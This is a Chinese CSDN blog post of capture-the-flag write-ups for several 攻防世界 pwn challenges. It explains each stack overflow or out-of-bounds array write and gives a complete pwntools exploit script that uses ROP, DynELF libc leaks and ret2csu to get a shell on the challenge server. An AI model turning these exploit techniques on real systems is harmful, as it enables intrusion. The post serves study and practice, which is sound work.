pwn学习-攻防世界(二)

最新推荐文章于 2024-03-12 16:28:06 发布
最新推荐文章于 2024-03-12 16:28:06 发布
阅读量426 收藏
点赞数
分类专栏: pwn 文章标签: 栈溢出 pwn wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45653588/article/details/112784905
版权

文章目录

0X00 pwn-100

下载文件,只开启了NX保护。

反编译一下,main函数调用了sub_40068E()函数,然后sub_40068E()函数调用了sub_40063D函数,第一个参数为v1,第二个参数为200.

int sub_40068E()
{
  char v1; // [rsp+0h] [rbp-40h]

  sub_40063D((__int64)&v1, 200);
  return puts("bye~");
}

__int64 __fastcall sub_40063D(__int64 a1, signed int a2)
{
  __int64 result; // rax
  unsigned int i; // [rsp+1Ch] [rbp-4h]

  for ( i = 0; ; ++i )
  {
    result = i;
    if ( (signed int)i >= a2 )
      break;
    read(0, (void *)((signed int)i + a1), 1uLL);
  }
  return result;
}

在这v1位于rbp-40h处,然后在第二个函数中,对v1进行输入,逐个字符读取,共读取200个字符,造成了溢出。

在程序中没有找到可利用的system函数和/bin/sh字符串,于是我们可以利用DynELF模块来进行泄露。

DynELF的基本利用模板为:

p = process('./xxx')
def leak(address):
  #各种预处理
  payload = "xxxxxxxx" + address + "xxxxxxxx"
  p.send(payload)
  #各种处理
  data = p.recv(4)
  log.debug("%#x => %s" % (address, (data or '').encode('hex')))
  return data

d = DynELF(leak, elf=ELF("./xxx"))      #初始化DynELF模块 
systemAddress = d.lookup('system', 'libc')  #在libc文件中搜索system函数的地址

可以借助该模块找到程序使用的libc文件,然后获取system函数,由于不能获取字符串的地址,我们可以利用vmmap在程序中找一个可读可写的地方读入/bin/sh字符串。

exp:

from pwn import *
context.log_level = 'debug'
io = remote('220.249.52.134',58720)
# io = process('../pwn100')
elf = ELF('../pwn100')
main = 0x0400550
puts_plt = elf.plt['puts']
read_plt = elf.plt['read']
rdi = 0x400763
gadget1 = 0x40075A
gadget2 = 0x400740
str_addr = 0x601000

def leak(address):
  payload = "a" * 0x48
  payload += p64(rdi)
  payload += p64(address)
  payload += p64(puts_plt)
  payload += p64(main)
  payload = payload.ljust(200,"a")
  io.send(payload)
  io.recvuntil("bye~\n")
  up = ""
  content = ""
  count = 0
  while True:
    c = io.recv(numb = 1, timeout = 0.5)
    count += 1
    if up == '\n' and c == "":
        content = content[:-1] + '\x00'
        break
    else:
        content += c
        up = c
  content = content[:4]
  return content

d = DynELF(leak, elf=elf)
systemAddress = d.lookup('system', 'libc')
getsAddress = d.lookup('gets', 'libc')
print(systemAddress)

payload = 'a' * 0x48 + p64(rdi) + p64(str_addr) + p64(getsAddress) + p64(main)
payload = payload.ljust(200,"a")
io.send(payload)
io.sendline('/bin/sh\x00')

payload = 'a' * 0x48 + p64(rdi) + p64(str_addr) + p64(systemAddress) + 'deadbeef'
payload = payload.ljust(200,"a")
io.sendline(payload)
io.interactive()

0x01 monkey

反编译一下,出来了好多东西,,

直接运行一下程序,显示’js>’,结合程序名字,猜测可以运行js代码。

直接nc连接,输入os.system('ls'),然后os.system('cat flag')即可。

JavaScript shell

0x02 stack2

开启了NX和canary的32位程序。

反编译一下查看源码,先输入要输入的数字的数量,然后输入要输入的数字。

之后有几个选项:
puts("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit");

可以发现输入3修改数字以后进行输入时,没有对数组边界进行判断,可能会造成数组的越界修改,然后还找到了名为hackhere()的后门函数,可以修改函数的返回地址返回到hackhere()处,获取shell。

于是接下来我们要寻找保存数字的数组的首地址,然后才能确定返回地址的位置。

根据数组初赋值处的汇编代码,0x080486B1处,eax=&(ebp+v7),栈地址压栈(指针入栈),只读字符串"%d"入栈,输入的数会由指针指向,*(ebp+v7)就是我们的输入,然后&(ebp+v7)赋值给eax寄存器,eax又赋值给ecx,然后mov [eax], cl又将数组的地址存入eax中。

也就是说在这,eax存的就是数组的首地址,那么我们找到main函数返回时的地址,相减就得到了偏移量。

.text:080486AE                 sub     esp, 8
.text:080486B1                 lea     eax, [ebp+v7]
.text:080486B7                 push    eax
.text:080486B8                 push    offset aD       ; "%d"
.text:080486BD                 call    ___isoc99_scanf
.text:080486C2                 add     esp, 10h
.text:080486C5                 mov     eax, [ebp+v7]
.text:080486CB                 mov     ecx, eax
.text:080486CD                 lea     edx, [ebp+v13]
.text:080486D0                 mov     eax, [ebp+i]
.text:080486D3                 add     eax, edx
.text:080486D5                 mov     [eax], cl

使用gdb调试一下。

找到数组首地址。

找到返回时的esp,ret语句时栈顶一定是返回地址。

偏移量:0xffffce3c - 0xffffcdb8 = 0x84

写出exp。

本地打通了,远程显示:sh: 1: /bin/bash: not found。

可以找一下字符串’sh’同样也可以。

exp:

# -*- coding:utf-8  -*-
from pwn import *

io = remote('220.249.52.134',58301)
# io = process('../stack2')

def modify(addr, num):
    io.sendlineafter('5. exit','3')
    io.sendlineafter('which number to change:',str(addr))
    io.sendlineafter('new number:',str(num))

io.sendlineafter('How many numbers you have:','1')
io.sendlineafter('Give me your numbers','1')

modify(0x84,0x50)
modify(0x85,0x84)
modify(0x86,0x04)
modify(0x87,0x08)

modify(0x8C,0x87)
modify(0x8D,0x89)
modify(0x8E,0x04)
modify(0x8F,0x08)

io.sendlineafter('5. exit','5')

io.interactive()

0x03 pwn-200

这题与pwn-100类似,都是利用DynELF模块来找libc。

read函数处存在栈溢出。

ssize_t sub_8048484()
{
  char buf; // [esp+1Ch] [ebp-6Ch]

  setbuf(stdin, &buf);
  return read(0, &buf, 0x100u);
}

利用DynELF模块找到libc后,返回程序的start处中期程序恢复帧栈。

最后调用两个函数并含有参数,所以需要调整栈平衡,read有三个参数,所以需要三次pop,可以利用ROPgadget查找。

exp:

from pwn import *
# context.log_level = 'debug'
io = remote('220.249.52.134',32400)
# io = process('../pwn200')
elf = ELF('../pwn200')

main = 0x080484BE
vul_addr = 0x08048484
write_plt = elf.plt['write']
read_plt = elf.plt['read']
bss = 0x0804A020
ret = 0x0804856c
start_addr = 0x080483D0

def leak(address):
    payload = 'a' * (0x6c + 4)
    payload += p32(write_plt)
    payload += p32(vul_addr)
    payload += p32(1)
    payload += p32(address)
    payload += p32(4)
    io.send(payload)
    data = io.recv(4)
    return data

io.recvline()
d = DynELF(leak, elf=elf)
systemAddress = d.lookup('system', 'libc')
print(hex(systemAddress))

payload = 'a' * (0x6c + 4) + p32(start_addr)
io.sendline(payload)
io.recv()

payload = 'a' * (0x6c + 4) + p32(read_plt) + p32(ret)+ p32(1) + p32(bss) + p32(8) + p32(systemAddress) + p32(0) + p32(bss)
io.sendline(payload)
io.sendline('/bin/sh')

io.interactive()

0x04 welpwn

只开启了NX保护。

buf可以读入0x400的空间,但是没有造成溢出。

将buf的地址作为参数传入echo函数,然后逐字节赋值到s2中。s2只有0x10的空间,但是buf最多可以读入0x400的内容,显然可以造成溢出。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-400h]

  write(1, "Welcome to RCTF\n", 0x10uLL);
  fflush(_bss_start);
  read(0, &buf, 0x400uLL);
  echo((__int64)&buf);
  return 0;
}

int __fastcall echo(__int64 a1)
{
  char s2[16]; // [rsp+10h] [rbp-10h]

  for ( i = 0; *(_BYTE *)(i + a1); ++i )
    s2[i] = *(_BYTE *)(i + a1);
  s2[i] = 0;
  if ( !strcmp("ROIS", s2) )
  {
    printf("RCTF{Welcome}", s2);
    puts(" is not flag");
  }
  return printf("%s", s2);
}

但是在赋值给s2时的for循环处,条件为*(_BYTE *)(i + a1),也就是说不能出现\x00,否则终止读入。而一般的地址末尾都会有\x00,而echo的函数栈处填充的junk字符为0x10个,于是我们可以找一个4个pop的gadget,就可以正常执行我们的rop链了。

函数栈
‘aaaaaaaa’
‘aaaaaaaa’
‘aaaaaaaa’
4_pop(rbp)
‘aaaaaaaa’
‘aaaaaaaa’
‘aaaaaaaa’
4_pop
ROP

利用DynELF模块来找libc(第几个了都。。),然后retcsu即可。

exp:

from pwn import *
# context.log_level = 'debug'
io = remote('220.249.52.134',36043)
# io = process('../wel')
elf = ELF('../wel')

start = 0x400630
pop = 0x40089c
rdi = 0x4008a3
rop1 = 0x40089A
rop2 = 0x400880
puts_plt = elf.plt["puts"]
read_got = elf.got['read']
write_got = elf.got['write']
bss = elf.bss()

def leak(address):
    io.recv(1024)
    payload = 'A' * 24 + p64(pop) + p64(rop1) + p64(0) + p64(1) + p64(write_got)
    payload += p64(8) + p64(address) + p64(1)
    payload += p64(rop2) + 'A'*56 + p64(start)
    payload = payload.ljust(1024,'A')
    io.send(payload)
    data = io.recv(8)
    print "%#x => %s" % (address,(data or '').encode('hex'))
    return data

d = DynELF(leak, elf=elf)
systemAddress = d.lookup('system', 'libc')
getsAddress = d.lookup('gets', 'libc')
print(hex(systemAddress))
print(hex(getsAddress))
io.recv(1024)
payload = 'A' * 24 + p64(pop) + p64(rop1) + p64(0) + p64(1) + p64(read_got) + p64(8) + p64(bss) + p64(0)
payload += p64(rop2) + 'A'*56 + p64(rdi) + p64(bss) + p64(systemAddress) + 'A' * 8
payload = payload.ljust(1024,'A')
io.send(payload)
io.send('/bin/sh')

io.interactive()
So4ms
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
重新启程
12-23 1329
题目地址:stack2 这是高手进阶区的第四题了,速度挺快啊,朋友!加油! 废话不说,看看题目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
关于sh: not found问题
GjGsoft's Technical Blog
04-09 7288
今天原本准备在QT210开发板上跑个hello world。没想到用arm-none-linux-gnueabi-gcc hello.c编译运行后,出现sh: not found,初看起来应该和动态库有关,于是开始了一段长达8小时的艰辛之旅,期间获益不少,记录如下。     首先,这款开发板预装的是android的环境,安卓环境的libc和gnu的libc有很多不同,编译过程区别也很大,我简单看
-/bin/sh: 命令:not found的解决办法
ee230的专栏
05-03 4606
https://blog.csdn.net/u011124985/article/details/80774171 https://blog.csdn.net/kunkliu/article/details/79816397 https://blog.csdn.net/nanhangfengshuai/article/details/50499246
Buuctf之pwn
qq_53809201的博客
05-07 664
1.pwn1 from pwn import * log_level = 'debug' elf = ELF("./pwn1") local = 0 if local: r = process("./pwn1") else: r = remote("node4.buuoj.cn",29317) bin_sh = 0x000000000040118A system_addr = 0x0000000000401191 payload = b'a'*0x0F + p64(system_addr) +
ubuntu | 编译时出现/bin/sh:1:pushd: not found
最新发布
m0_57195758的博客
03-12 658
ubuntu | 编译时出现/bin/sh:1:pushd: not found
PWN-栈溢出之ret2csu
weixin_53394081的博客
04-23 332
PWN-栈溢出之ret2csu
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn入门学习-附件资源
03-05
pwn入门学习-附件资源
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
python栈溢出_栈基础 & 栈溢出 & 栈溢出进阶
weixin_39584549的博客
12-08 847
author : shavchentitle : stack-ooverflow exploit栈基础内存四区代码区(.text):这个区域存储着被装入执行的进制机器代码,处理器会到这个区域取指令执行。数据区(.data):用于存储全局变量和静态变量等。堆区:动态地分配和回收内存,进程可以在堆区动态地请求一定大小的内存,并在用完后归还给堆区。地址由高到低生长栈区:用于动态地存储函数之间的调用关系...
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目进制文件和libc的进制文件
攻防世界 pwn-100
weixin_56777139的博客
03-20 334
此处有一处值得一提,发送payload时注意sendline和send,sendline会自动在200个字符后加’\n’,缓冲区内则为200个字符加’\n’的形式,当复制200个字符串后返回主函数地址,缓冲区内还有’\n’,而主函数没有刷新缓冲区,所以返回主函数后进入下一轮的复制函数会将缓冲区头部的’\n’复制到内存中。构造新的payload,注意上述说的sendline和send对于此处的影响,若之前处用的sendline,那此处b’a’数量为0x48-1=0x47即可。此时即可接收泄露的内容。
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3302
一、checksec一下 开启了NX 、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 402
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界-PWN-Challenge-Wirteup
07-29 802
目录 dice_game 反应釜开关控制 dice_game 这个提跟新手区一个题很像,都是利用溢出覆盖随机数的种子,使得随机数产生的序列固定,在本地产生序列后脚本提交就可以了 ida查看程序 栈信息: 将seed覆盖为全0,使用c在kali中跑一下: #include <stdlib.h> #include <stdio.h> int main() { srand(0); for(int i = 0; i < 50; i++) { i.
CISCN-2018-Quals note-service2
qq_41071646的博客
07-23 964
这几天看 wiki 有点头疼 刷会 攻防世界 (那个echo_back 真的头疼 那个 文件结构 不知道是怎么搞出来的) 哪一行代码也不是很清楚是怎么做的 于是就直接跳过那个题目了 note-service2 这个题用ida 分析的时候 看见 show 不能用 笑容 逐渐 凝固 看见edit 不能用的时候 直接关闭了ida 然后发现保护如下 shellcode 一把梭鸭 ...
[漏洞分析] 栈基础 & 栈溢出 & 栈溢出进阶
Poo_Chai的博客
10-27 1291
[漏洞分析]栈基础 & 栈溢出 & 栈溢出进阶 栈基础 内存四区 代码区(.text):这个区域存储着被装入执行的进制机器代码,处理器会到这个区域取指令执行。 数据区(.data):用于存储全局变量和静态变量等。 堆区:动态地分配和回收内存,进程可以在堆区动态地请求一定大小的内存,并在用...
攻防世界pwn高手进阶(持续更新)
qq_42988973的博客
12-16 505
攻防世界pwn高手进阶wp
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值